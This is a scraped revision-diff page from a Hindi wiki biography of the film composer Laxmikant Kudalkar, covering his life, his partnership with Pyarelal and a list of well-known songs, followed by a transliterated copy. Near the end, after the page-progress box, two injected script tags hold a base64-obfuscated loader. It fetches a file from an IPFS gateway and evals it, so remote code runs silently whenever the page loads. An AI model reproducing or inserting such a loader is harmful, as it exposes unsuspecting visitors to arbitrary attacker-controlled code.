Difference between revisions of "लक्ष्मीकांत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
{{सूचना बक्सा कलाकार
 
{{सूचना बक्सा कलाकार
 
|चित्र=laxmikant.jpg
 
|चित्र=laxmikant.jpg
Line 6: Line 5:
 
|प्रसिद्ध नाम=लक्ष्मीकांत
 
|प्रसिद्ध नाम=लक्ष्मीकांत
 
|अन्य नाम=
 
|अन्य नाम=
|जन्म=1937
+
|जन्म=[[3 नवंबर]], [[1937]]
|जन्म भूमि=
+
|जन्म भूमि=[[बंबई]] (अब [[मुंबई]])
|मृत्यु=
+
|मृत्यु=[[25 मई]], [[1998]]
 
|मृत्यु स्थान=
 
|मृत्यु स्थान=
 
|अविभावक=
 
|अविभावक=
 
|पति/पत्नी=
 
|पति/पत्नी=
 
|संतान=
 
|संतान=
|कर्म भूमि=
+
|कर्म भूमि=मुंबई
 
|कर्म-क्षेत्र=संगीतकार
 
|कर्म-क्षेत्र=संगीतकार
|मुख्य रचनाएँ=
+
|मुख्य रचनाएँ=सावन का महीना, दिल विल प्यार व्यार, बिन्दिया चमकेगी, चिट्ठी आई है आदि
|मुख्य फ़िल्में=
+
|मुख्य फ़िल्में=मिलन, शागिर्द, इंतक़ाम, दो रास्ते, सरगम, हीरो, नाम, तेज़ाब, खलनायक आदि
 
|विषय=
 
|विषय=
 
|शिक्षा=
 
|शिक्षा=
 
|विद्यालय=
 
|विद्यालय=
|पुरस्कार-  
+
|पुरस्कार-उपाधि=लक्ष्मीकांत-प्यारेलाल की जोड़ी ने सात बार सर्वश्रेष्ठ संगीतकार का फ़िल्मफेयर पुरस्कार जीता।
|प्रसिद्धि=
+
|प्रसिद्धि=  
 
|विशेष योगदान=
 
|विशेष योगदान=
 
|नागरिकता=भारतीय  
 
|नागरिकता=भारतीय  
Line 33: Line 32:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
 +
'''लक्ष्मीकांत कांताराम कुदलकर''' (जन्म: [[3 नवंबर]], [[1937]] बंबई - मृत्यु: [[25 मई]], [[1998]]) हिन्दी सिनेमा के प्रसिद्ध संगीतकार हैं जिनकी जोड़ी संगीतकार प्यारेलाल के साथ 'लक्ष्मीकांत प्यारेलाल' के नाम से मशहूर है।
 +
==संक्षिप्त परिचय==
 +
* लक्ष्मीकांत का जन्म 3 नवंबर 1937 में हुआ था। नौ वर्ष की छोटी सी उम्र मे हीं उनके पिता का निधन हो गया, जिसके कारण उन्हें बीच में ही अपनी पढ़ाई छोड़ देनी पड़ी। बचपन के दिनों से ही लक्ष्मीकांत का रुझान संगीत की ओर था और वह संगीतकार बनना चाहते थे।
 +
* लक्ष्मीकांत ने [[संगीत]] की प्रारंभिक शिक्षा उस्ताद हुसैन अली से हासिल की। इस बीच घर की जरूरतों को पूरा करने के लिए लक्ष्मीकांत ने संगीत समारोह में हिस्सा लेना शुरू कर दिया। आगे चलकर वाद्य यंत्र मेंडोलियन बजाने की शिक्षा बालमुकुंद इंदौरकर से ली।
 +
* लक्ष्मीकांत-प्यारेलाल की जोड़ी के रूप में फिल्म जगत में अपने संगीत का लोहा मनवाकर ही माने।
 +
* अपने कैरियर की शुरुआत कल्याण जी आनन्द के बतौर सहायक के तौर पर उन्होंने मदारी, सत्ता बाजार, छलिया और दिल तेरा हम भी तेरे जैसी कई फिल्मों में काम किया।
 +
* इस जोड़ी पर संगीत का ऐसा जुनुन था कि मशहूर निर्माता-निर्देशक बाबू भाई मिस्त्री की क्लासिकल फिल्म पारसमणि ने इनकी तकदीर बदल कर रख दी। फिर पीछे मुड़कर देखने का मौका हीं नहीं मिला।
 +
====कुछ प्रसिद्ध गीत====
 +
लक्ष्मीकांत-प्यारेलाल की जोड़ी ने हिन्दी सिनेमा को बेहतरीन गीत दिये उनमें कुछ के नाम नीचे दिये गये हैं।
 +
* सावन का महीना... (फ़िल्म- मिलन)
 +
* दिल विल प्यार व्यार... (फ़िल्म- शागिर्द)
 +
* बिन्दिया चमकेगी... (फ़िल्म- दो रास्ते)
 +
* मंहगाई मार गई... (फ़िल्म- रोटी कपड़ा और मकान)
 +
* डफली वाले... (फ़िल्म- सरगम)
 +
* तू मेरा हीरो है... (फ़िल्म- हीरो )
 +
* यशोदा का नन्दलाला... (फ़िल्म- संजोग)
 +
* चिट्ठी आई है... (फ़िल्म- नाम)
 +
* एक दो तीन... (फ़िल्म- तेज़ाब)
 +
* चोली के पीछे क्या है... (फ़िल्म- खलनायक)
  
संगीत एक शक्ति है, इसी के माध्यम से लोग को अपना दर्द बांटते हैं। संगीत जाति और धर्म से परे होता है। लेकिन संगीत को सजाने और संवारने वाले की बात करें तो भला लक्ष्मीकांत को कैसे भुलाया जा सकता है।
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
 
लक्ष्मीकांत कांताराम कुदलकर का जन्म 1937 में हुआ था। नौ वर्ष की छोटी सी उम्र मे हीं उनके पिता का निधन हो गया, जिसके कारण उन्हें बीच में ही अपनी पढ़ाई छोड़ देनी पड़ी। बचपन के दिनों से ही लक्ष्मीकांत का रुझान संगीत की ओर था और वह संगीतकार बनना चाहते थे। लक्ष्मीकांत ने संगीत की प्रारंभिक शिक्षा उस्ताद हुसैन अली से हासिल की। इस बीच घर की जरूरतों को पूरा करने के लिए लक्ष्मीकांत ने संगीत समारोह में हिस्सा लेना शुरू कर दिया। आगे चलकर वाद्य यंत्र मेंडोलियन बजाने की शिक्षा बालमुकुंद इंदौरकर से ली।
 
 
 
बाद के दिनों में लक्ष्मीकांत-प्यारे लाल की जोड़ी के रूप में फिल्म जगत में अपने संगीत का लोहा मनवाकर हीं माने। अपने कैरियर की शुरुआत कल्याण जी आनन्द के बतौर सहायक के तौर पर उन्होंने मदारी, सत्ता बाजार, छलिया और दिल तेरा हम भी तेरे जैसी कई फिल्मों में काम किया। इसी दरम्यान चार भेजपुरी फिल्मों में संगीत देने का प्रस्ताव दुर्भाग्यवश नहीं मिल पाया। इस जोड़ी पर संगीत का ऐसा जुनुन था कि मशहूर निर्माता-निर्देशक बाबू भाई मिस्त्री की क्लासिकल फिल्म पारसमणि ने इनकी तकदीर बदल कर रख दी। फिर पीछे मुड़कर देखने का मौका हीं नहीं मिला। हंसता हुआ नूरानी चेहरा...और वो जब याद आए....जैसी इन मधुर गीतों की तासीर आज भी लोगों के जेहन में बरकरार है।
 
 
 
 
 
 
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{संगीतकार}}
 
+
[[Category:सिनेमा]]
 +
[[Category:सिनेमा कोश]][[Category:चरित कोश]]
 +
[[Category:संगीतकार]][[Category:संगीत कोश]][[Category:कला कोश]]
 
__INDEX__
 
__INDEX__
[[Category:संगीतकार]]
+
__NOTOC__

Revision as of 14:19, 12 June 2012

lakshmikaant
poora nam lakshmikaant kaantaram kudalakar
prasiddh nam lakshmikaant
janm 3 navanbar, 1937
janm bhoomi banbee (ab muanbee)
mrityu 25 mee, 1998
karm bhoomi muanbee
karm-kshetr sangitakar
mukhy rachanaean savan ka mahina, dil vil pyar vyar, bindiya chamakegi, chitthi aee hai adi
mukhy filmean milan, shagird, iantaqam, do raste, saragam, hiro, nam, tezab, khalanayak adi
puraskar-upadhi lakshmikaant-pyarelal ki jo di ne sat bar sarvashreshth sangitakar ka filmapheyar puraskar jita.
nagarikata bharatiy

lakshmikaant kaantaram kudalakar (janm: 3 navanbar, 1937 banbee - mrityu: 25 mee, 1998) hindi sinema ke prasiddh sangitakar haian jinaki jo di sangitakar pyarelal ke sath 'lakshmikaant pyarelal' ke nam se mashahoor hai.

sankshipt parichay

  • lakshmikaant ka janm 3 navanbar 1937 mean hua tha. nau varsh ki chhoti si umr me hian unake pita ka nidhan ho gaya, jisake karan unhean bich mean hi apani padhaee chho d deni p di. bachapan ke dinoan se hi lakshmikaant ka rujhan sangit ki or tha aur vah sangitakar banana chahate the.
  • lakshmikaant ne sangit ki praranbhik shiksha ustad husain ali se hasil ki. is bich ghar ki jarooratoan ko poora karane ke lie lakshmikaant ne sangit samaroh mean hissa lena shuroo kar diya. age chalakar vady yantr meandoliyan bajane ki shiksha balamukuand iandaurakar se li.
  • lakshmikaant-pyarelal ki jo di ke roop mean philm jagat mean apane sangit ka loha manavakar hi mane.
  • apane kairiyar ki shuruat kalyan ji anand ke bataur sahayak ke taur par unhoanne madari, satta bajar, chhaliya aur dil tera ham bhi tere jaisi kee philmoan mean kam kiya.
  • is jo di par sangit ka aisa junun tha ki mashahoor nirmata-nirdeshak baboo bhaee mistri ki klasikal philm parasamani ne inaki takadir badal kar rakh di. phir pichhe mu dakar dekhane ka mauka hian nahian mila.

kuchh prasiddh git

lakshmikaant-pyarelal ki jo di ne hindi sinema ko behatarin git diye unamean kuchh ke nam niche diye gaye haian.

  • savan ka mahina... (film- milan)
  • dil vil pyar vyar... (film- shagird)
  • bindiya chamakegi... (film- do raste)
  • manhagaee mar gee... (film- roti kap da aur makan)
  • daphali vale... (film- saragam)
  • too mera hiro hai... (film- hiro )
  • yashoda ka nandalala... (film- sanjog)
  • chitthi aee hai... (film- nam)
  • ek do tin... (film- tezab)
  • choli ke pichhe kya hai... (film- khalanayak)


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh